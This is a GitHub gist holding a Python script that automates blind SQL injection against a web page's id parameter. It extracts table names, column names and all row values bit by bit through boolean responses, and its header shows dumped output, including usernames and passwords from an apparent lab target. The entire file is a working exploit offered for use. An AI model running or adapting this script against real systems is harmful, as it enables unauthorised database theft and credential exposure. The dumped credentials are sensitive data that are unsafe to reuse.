Last active
September 19, 2015 03:12
-
-
Save AdrienLemaire/38d09af4f2a6bbb3c926 to your computer and use it in GitHub Desktop.
Blindly retrieve table, columns and rows informations in a database with bitwise comparisons
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
""" | |
$ ./sqli8_blind_injection.py -u http://172.28.128.3:8007/membre.php\?id\=7 -e Mickey | |
OtherInformation: | |
* idusers | |
-> 7,8,9,10,11 | |
* useyourname | |
-> Mickey,Kenshin,Jin,Camus,Pierre | |
* position | |
-> user,user,admin,user,user | |
* programmation | |
-> Asm, C, C++,Pyhton, Ruby,VB, PHP,Pascal, Fortan,Brainfuck, Delphi | |
* biographie | |
-> Programmation, reversing,Cryptographie, Steganographie,Web, Logique,Wargame,Programmation, Reversing | |
* naissance | |
-> 16/07/1991,20/02/1979,10/10/1998,25/12/1992,06/06/1996 | |
* score | |
-> 15000,26000,400,103000,51000 | |
WhatIsMyName: | |
* idusers | |
-> 7,8,9,10,11 | |
* ISeeDeadPeople | |
-> Mickey,Kenshin,Jin,Camus,Pierre | |
* NoWatching | |
-> themouse,bongarsva!,k4z4maWin,DuVerseau,Quiroulenamassepasmousse | |
""" | |
import requests | |
import argparse | |
DEBUG = False | |
LOG = lambda name, var: DEBUG and print('{}: {}'.format(name, var)) | |
CHOICES = ['table', ] | |
SUBQUERIES = { | |
# find the table name | |
'table': """(select group_concat(table_name separator ',') | |
from information_schema.tables where table_schema=database())""", | |
'columns': lambda table: """(select group_concat(column_name separator ',') | |
from information_schema.columns where table_name='{}')""".format(table), | |
'values': lambda table, column: """(select group_concat({} separator ',') | |
from {})""".format(column, table), | |
} | |
# QUERY EXPLAINED: | |
# subquery: SUBQUERIES.values(), depends what we're looking for | |
# idx: position of the char to identify | |
# shift: bit shifting position, to find a char in 8 requests | |
# n: expected number, will return a boolean to answer the bitwise question | |
QUERY = lambda subquery, idx, shift, n: """' and (ascii(substring({},{},1)) | |
>> {})='{}""".format(subquery, idx, shift, n) | |
def main(url, expected, subquery, debug): | |
global DEBUG | |
DEBUG = debug | |
s = requests.Session() | |
result = '' | |
while 1: | |
idx = len(result) + 1 | |
n = 0 | |
for shift in reversed(range(8)): | |
LOG('n', n) | |
n = n << 1 | |
exploit_url = url + QUERY(subquery, idx, shift, n) | |
page = s.post(exploit_url) | |
# if n = 100 and page is returned, then n is correct. else n = 101 | |
n += 0 if expected in page.text else 1 | |
if not n: | |
# No character was found, end of result | |
return result | |
result += chr(n) | |
LOG('result', result) | |
def parse_args(): | |
parser = argparse.ArgumentParser(description='Blind Injection exploit') | |
parser.add_argument('-u', '--url', action='store', dest='url', required=True, | |
help='url to exploit, eg "http://172.28.128.3:8007/membre.php?id=7"') | |
parser.add_argument('-e', '--expected', action='store', dest='expected', | |
help='expected string to find in page result for argument', required=True) | |
parser.add_argument('--debug', action='store_true', dest='debug', | |
help='verbose print') | |
#parser.add_argument('-f', '--find', help='data to find', | |
#action='store', dest='to_find', choices=CHOICES, required=True) | |
return parser.parse_args() | |
if __name__ == '__main__': | |
args = parse_args() | |
#result = main(args.url, args.expected, SUBQUERIES[args.to_find], args.debug) | |
# First let's get the tables | |
tables = main(args.url, args.expected, SUBQUERIES['table'], args.debug) | |
for table in tables.split(','): | |
print('{}:'.format(table)) | |
columns = main(args.url, args.expected, SUBQUERIES['columns'](table), | |
args.debug) | |
# Then let's search for the table columns | |
for column in columns.split(','): | |
print('\t* {}'.format(column)) | |
# Finally retrieve all values for that column | |
values = main(args.url, args.expected, | |
SUBQUERIES['values'](table, column), args.debug) | |
print ('\t\t-> {}'.format(values)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment